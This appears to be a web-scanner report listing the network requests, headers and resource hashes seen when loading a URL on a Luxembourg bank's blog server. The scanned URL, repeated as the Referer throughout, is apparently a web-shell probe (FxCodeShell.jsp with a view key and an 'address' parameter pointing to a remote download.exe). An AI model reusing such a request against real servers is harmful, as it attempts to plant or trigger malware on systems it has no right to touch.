Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID=C7012681583F030784BDCB7E0E838998; JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 990
X-XSS-Protection: 1
Last-Modified: Thu, 01 Feb 2018 06:24:22 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "663d1245"
Vary: Accept-Encoding
Content-Type: text/javascript
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=97
Expires: Wed, 04 Apr 2029 15:50:43 GMT

GET
H2 200 analytics.js Show response
www.google-analytics.com/ 43 KB
17 KB 8ms
5ms Script
text/javascript 2a00:1450:4001:81e::200e
Google LLC

General

Check archive.org

Show headers Download Go to

Full URL

https://www.google-analytics.com/analytics.js

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

2a00:1450:4001:81e::200e , Ireland, ASN15169 (GOOGLE - Google LLC, US),

Reverse DNS

Software

Golfe2 /

Resource Hash

3e552578c7d450b023f2cd9d28f830be4335c3acc6c4ab6dadda0769f09e5f22

Security Headers

Name	Value
Strict-Transport-Security	max-age=10886400; includeSubDomains; preload
X-Content-Type-Options	nosniff

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

strict-transport-security: max-age=10886400; includeSubDomains; preload
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Wed, 16 Jan 2019 20:01:45 GMT
server: Golfe2
age: 231
date: Sun, 07 Apr 2019 15:46:56 GMT
vary: Accept-Encoding
content-type: text/javascript
status: 200
cache-control: public, max-age=7200
timing-allow-origin: *
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
content-length: 17543
expires: Sun, 07 Apr 2019 17:46:56 GMT

GET
H/1.1 200
OK piwik.js Show response
stats.banquedeluxembourg.com/ 58 KB
58 KB 206ms
46ms Script
application/javascript 193.178.219.143

General

Check archive.org

Show headers Download Go to

Full URL

https://stats.banquedeluxembourg.com/piwik.js

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.143 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache /

Resource Hash

4f51df044b76eabafab2fbf420871d472c8f3a629da79ec5fac75c530d79f266

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN, sameorigin
X-Xss-Protection	1; mode=block

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Date: Sun, 07 Apr 2019 15:50:48 GMT
X-Content-Type-Options: nosniff
Last-Modified: Fri, 16 Dec 2016 04:02:33 GMT
Server: Apache
ETag: "e7dc-543bea3b5c840"
X-Frame-Options: SAMEORIGIN, sameorigin
Content-Type: application/javascript
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=100
Content-Length: 59356
X-XSS-Protection: 1; mode=block

GET
H/1.1 200
OK Roboto-Regular-webfont.woff2
193.178.219.134/bl-blog-theme/css/fonts/ 21 KB
21 KB 37ms
35ms Font
font/woff2 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/css/fonts/Roboto-Regular-webfont.woff2

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

671036ec7a125397d386703d507a3c0af171725c0d1271d1ac0091a704c8197d

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Origin: https://193.178.219.134
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/bl-blog-theme/css/main.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1517466262971
Cookie: JSESSIONID=C7012681583F030784BDCB7E0E838998; JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Referer: https://193.178.219.134/bl-blog-theme/css/main.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1517466262971
Origin: https://193.178.219.134

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
ETag: W/"21132-1487085486451"
X-Frame-Options: SAMEORIGIN SAMEORIGIN
Content-Type: font/woff2
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=95
Content-Length: 21132
X-XSS-Protection: 1

GET
H/1.1 200
OK fontawesome-webfont.woff2
193.178.219.134/bl-blog-theme/css/fonts/fontawesome/ 63 KB
63 KB 34ms
32ms Font
font/woff2 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/css/fonts/fontawesome/fontawesome-webfont.woff2?v=4.4.0

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

3c4a1bb7ce3234407184f0d80cc4dec075e4ad616b44dcc5778e1cfb1bc24019

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Origin: https://193.178.219.134
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/bl-blog-theme/css/font-awesome.css
Cookie: JSESSIONID=C7012681583F030784BDCB7E0E838998; JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Referer: https://193.178.219.134/bl-blog-theme/css/font-awesome.css
Origin: https://193.178.219.134

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
ETag: W/"64464-1487085486587"
X-Frame-Options: SAMEORIGIN SAMEORIGIN
Content-Type: font/woff2
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=96
Content-Length: 64464
X-XSS-Protection: 1

GET
H/1.1 200
OK / Show response
193.178.219.134/combo/ 3 KB
2 KB 79ms
78ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/combo/?browserId=other&minifierType=&languageId=en_US&b=6205&t=1553406106270&/html/js/aui/color-base/color-base-min.js

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/html/js/barebone.jsp?browserId=other&themeId=blblog_WAR_blblogtheme&colorSchemeId=bli&minifierType=js&minifierBundleId=javascript.barebone.files&languageId=en_US&b=6205&t=1553406106270

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

4c54255f7c67fa7f3311311d2acadf399ed1d61dc9345980387bf79ae5f81e72

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 1313
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:46 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "e5433f95"
Vary: Accept-Encoding
Content-Type: text/javascript
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=96
Expires: Wed, 04 Apr 2029 15:50:44 GMT

GET
H/1.1 200
OK social-icones-blogs.png
193.178.219.134/bl-blog-theme/images/ 4 KB
5 KB 40ms
39ms Image
image/png 193.178.219.134

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://193.178.219.134/bl-blog-theme/images/social-icones-blogs.png

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

a970f1aebda9fbd643f5478ebd31ded53da17773400673e90d7bdef8f20079f8

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: https://193.178.219.134/bl-blog-theme/css/main.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1517466262971
Cookie: JSESSIONID=C7012681583F030784BDCB7E0E838998; JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/bl-blog-theme/css/main.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1517466262971
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 4523
X-XSS-Protection: 1
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "a7a95b00"
Vary: Accept-Encoding
Content-Type: image/png
Cache-Control: max-age=315360000, public
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=97
Expires: Wed, 04 Apr 2029 15:50:44 GMT

GET
H2

200

cse.js Show response
cse.google.com/cse/
Redirect Chain

https://www.google.com/cse/cse.js?cx=008097758809389850888%3Aud1vruy6hee
https://cse.google.com/cse/cse.js?cx=008097758809389850888%3Aud1vruy6hee

10 KB
4 KB

59ms
31ms

Script
text/javascript

2a00:1450:4001:809::200e
Google LLC

General

Check archive.org

Show headers Download Go to

Full URL

https://cse.google.com/cse/cse.js?cx=008097758809389850888%3Aud1vruy6hee

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

Security

TLS 1.2, ECDHE_ECDSA, AES_128_GCM

Server

2a00:1450:4001:809::200e , Ireland, ASN15169 (GOOGLE - Google LLC, US),

Reverse DNS

Software

gws /

Resource Hash

d9d5e3f96a67d5fc7fa367e03c110bdf71b99eed38ef164529fe9aec38eb1582

Security Headers

Name	Value
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	0

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

date: Sun, 07 Apr 2019 15:50:48 GMT
content-encoding: br
server: gws
x-frame-options: SAMEORIGIN
p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
status: 200
cache-control: private
content-disposition: attachment; filename="f.txt"
content-type: text/javascript; charset=UTF-8
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
content-length: 3237
x-xss-protection: 0
expires: Sun, 07 Apr 2019 15:50:48 GMT

Redirect headers

date: Sun, 07 Apr 2019 15:50:48 GMT
x-content-type-options: nosniff
server: sffe
location: https://cse.google.com/cse/cse.js?cx=008097758809389850888%3Aud1vruy6hee
content-type: text/html; charset=UTF-8
status: 302
cache-control: private
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
content-length: 269
x-xss-protection: 0

GET
H/1.1 200
OK RobotoCondensed-Regular-webfont.woff2
193.178.219.134/bl-blog-theme/css/fonts/ 21 KB
22 KB 40ms
40ms Font
font/woff2 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/css/fonts/RobotoCondensed-Regular-webfont.woff2

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/bl-blog-theme/js/jquery-1.11.3.min.js

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

038c71d557812646455d5eeebb9cf7925c8a47774b9c664acf12c7a41ba3f376

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Origin: https://193.178.219.134
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/bl-blog-theme/css/main.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1517466262971
Cookie: JSESSIONID=C7012681583F030784BDCB7E0E838998; JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Referer: https://193.178.219.134/bl-blog-theme/css/main.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1517466262971
Origin: https://193.178.219.134

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
ETag: W/"21664-1487085486539"
X-Frame-Options: SAMEORIGIN SAMEORIGIN
Content-Type: font/woff2
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=94
Content-Length: 21664
X-XSS-Protection: 1

GET
H2 200 collect
www.google-analytics.com/ 35 B
108 B 11ms
5ms Image
image/gif 2a00:1450:4001:81e::200e
Google LLC

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://www.google-analytics.com/collect?v=1&_v=j73&a=882569879&t=pageview&_s=1&dl=https%3A%2F%2F193.178.219.134%2Fen%2Fbank%2Fblinvestmentsblog%2FFxCodeShell.jsp%3Fview%3DFxxkMyLie1836710Aa%26os%3D1%26address%3Dhttp%3A%2F%2Ffid.hognoob.se%2Fdownload.exe&ul=en-us&de=UTF-8&dt=Page%20not%20available%20-%20BL%20Investments%20Blog&sd=24-bit&sr=1600x1200&vp=1600x1200&je=0&_u=IGBAgEAB~&jid=547237299&gjid=369708804&cid=951552957.1554652248&tid=UA-3332547-2&_gid=1199922075.1554652248&z=457146401

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

2a00:1450:4001:81e::200e , Ireland, ASN15169 (GOOGLE - Google LLC, US),

Reverse DNS

Software

Golfe2 /

Resource Hash

8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015

Security Headers

Name	Value
X-Content-Type-Options	nosniff

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

pragma: no-cache
date: Sat, 09 Mar 2019 05:09:36 GMT
x-content-type-options: nosniff
last-modified: Sun, 17 May 1998 03:00:00 GMT
server: Golfe2
age: 2544072
content-type: image/gif
status: 200
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
cache-control: no-cache, no-store, must-revalidate
access-control-allow-origin: *
content-length: 35
expires: Mon, 01 Jan 1990 00:00:00 GMT

GET
H2

200

ga-audiences
www.google.de/ads/
Redirect Chain

https://stats.g.doubleclick.net/r/collect?t=dc&aip=1&_r=3&v=1&_v=j73&tid=UA-3332547-2&cid=951552957.1554652248&jid=547237299&gjid=369708804&_gid=1199922075.1554652248&_u=IGBAgEAB~&z=463232346
https://www.google.com/ads/ga-audiences?v=1&aip=1&t=sr&_r=4&tid=UA-3332547-2&cid=951552957.1554652248&jid=547237299&_v=j73&z=463232346
https://www.google.de/ads/ga-audiences?v=1&aip=1&t=sr&_r=4&tid=UA-3332547-2&cid=951552957.1554652248&jid=547237299&_v=j73&z=463232346&slf_rd=1&random=1485780458

42 B
376 B

33ms
20ms

Image
image/gif

2a00:1450:4001:815::2003
Google LLC

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://www.google.de/ads/ga-audiences?v=1&aip=1&t=sr&_r=4&tid=UA-3332547-2&cid=951552957.1554652248&jid=547237299&_v=j73&z=463232346&slf_rd=1&random=1485780458

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

2a00:1450:4001:815::2003 , Ireland, ASN15169 (GOOGLE - Google LLC, US),

Reverse DNS

Software

cafe /

Resource Hash

ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

pragma: no-cache
date: Sun, 07 Apr 2019 15:50:48 GMT
x-content-type-options: nosniff
content-type: image/gif
server: cafe
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
status: 200
cache-control: no-cache, no-store, must-revalidate
timing-allow-origin: *
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
content-length: 42
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

pragma: no-cache
date: Sun, 07 Apr 2019 15:50:48 GMT
x-content-type-options: nosniff
server: cafe
timing-allow-origin: *
location: https://www.google.de/ads/ga-audiences?v=1&aip=1&t=sr&_r=4&tid=UA-3332547-2&cid=951552957.1554652248&jid=547237299&_v=j73&z=463232346&slf_rd=1&random=1485780458
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
status: 302
cache-control: no-cache, no-store, must-revalidate
content-type: text/html; charset=UTF-8
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
content-length: 0
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

GET
H/1.1 200
OK / Show response
193.178.219.134/combo/ 5 KB
2 KB 40ms
39ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/combo/?browserId=other&minifierType=&languageId=en_US&b=6205&t=1553406106270&/html/js/aui/event-touch/event-touch-min.js&/html/js/aui/event-move/event-move-min.js

Requested by

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

2372731315cbead498d6f05c7d3b92016db1b974181033fdccb003ab3ec7a9a3

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.1.951552957.1554652248; _gid=GA1.1.1199922075.1554652248; _gat=1
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 1975
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:46 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "5da1a30e"
Vary: Accept-Encoding
Content-Type: text/javascript
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=95
Expires: Wed, 04 Apr 2029 15:50:44 GMT

GET
H2 200 cse_element__en.js Show response
www.google.com/cse/static/element/af400e744a60d2b3/ 238 KB
77 KB 9ms
8ms Script
text/javascript 2a00:1450:4001:817::2004
Google LLC

General

Check archive.org

Show headers Download Go to

Full URL

https://www.google.com/cse/static/element/af400e744a60d2b3/cse_element__en.js?usqp=CAI%3D

Requested by

Host: cse.google.com
URL: https://cse.google.com/cse/cse.js?cx=008097758809389850888%3Aud1vruy6hee

Protocol

Security

TLS 1.2, ECDHE_ECDSA, AES_128_GCM

Server

2a00:1450:4001:817::2004 , Ireland, ASN15169 (GOOGLE - Google LLC, US),

Reverse DNS

Software

sffe /

Resource Hash

d2c1d74b209046bbc1bfd56f501d7a4627c2c908abd05916eac528a5def808cc

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	1; mode=block

Request headers

Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

date: Fri, 15 Mar 2019 03:41:14 GMT
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Tue, 12 Mar 2019 20:14:44 GMT
server: sffe
age: 2030974
vary: Accept-Encoding
content-type: text/javascript
status: 200
cache-control: public, max-age=31536000
accept-ranges: bytes
alt-svc: quic=":443"; ma=2592000; v="46,44,43,39"
content-length: 79215
x-xss-protection: 1; mode=block
expires: Sat, 14 Mar 2020 03:41:14 GMT

GET
H2 200 default+en.css
www.google.com/cse/static/element/af400e744a60d2b3/ 44 KB
10 KB 11ms
11ms Stylesheet
text/css 2a00:1450:4001:817::2004
Google LLC

General

Check archive.org

Show headers Download Go to

Full URL

https://www.google.com/cse/static/element/af400e744a60d2b3/default+en.css

Requested by

Host: cse.google.com
